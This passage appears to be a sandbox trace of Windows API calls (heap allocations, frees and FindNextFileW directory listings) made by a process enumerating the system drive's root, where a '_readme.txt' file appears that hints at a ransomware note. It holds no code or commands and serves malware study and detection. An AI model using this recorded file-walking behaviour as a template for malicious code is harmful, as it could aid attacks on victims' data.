(HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c188 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.485] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0165.485] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c188 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c188 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.485] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe99ea380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe99ea380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xfc) returned 0xd57fe0 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608ae0 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c188 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd3b9b0 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1d8 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd11f78 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0165.486] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b18 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0165.486] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.486] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x16c) returned 0x35f7c30 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c250 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd11f78 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c278 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0165.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2c8 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608ae0 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c188 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3b9b0 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b18 | out: hHeap=0xcd0000) returned 1 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1d8 | out: hHeap=0xcd0000) returned 1 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.487] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd3b9b0 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b410b0 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b410f8 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b410b0 | out: hHeap=0xcd0000) returned 1 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3b9b0 | out: hHeap=0xcd0000) returned 1 [0165.487] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17a076c0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x17a076c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x17a076c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.487] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.487] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x214) returned 0x3b39e58 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b18 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c188 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd3b9b0 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2f0 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c318 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608ae0 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c340 [0165.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.488] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b410b0 [0165.488] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.488] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c250 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd11f78 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c278 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2a0 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2c8 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1d8 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b410f8 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0165.488] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.488] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0x19a29fc0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x19a29fc0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19a29fc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0165.488] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0x19a29fc0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x19a29fc0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19a29fc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0165.488] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0165.489] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 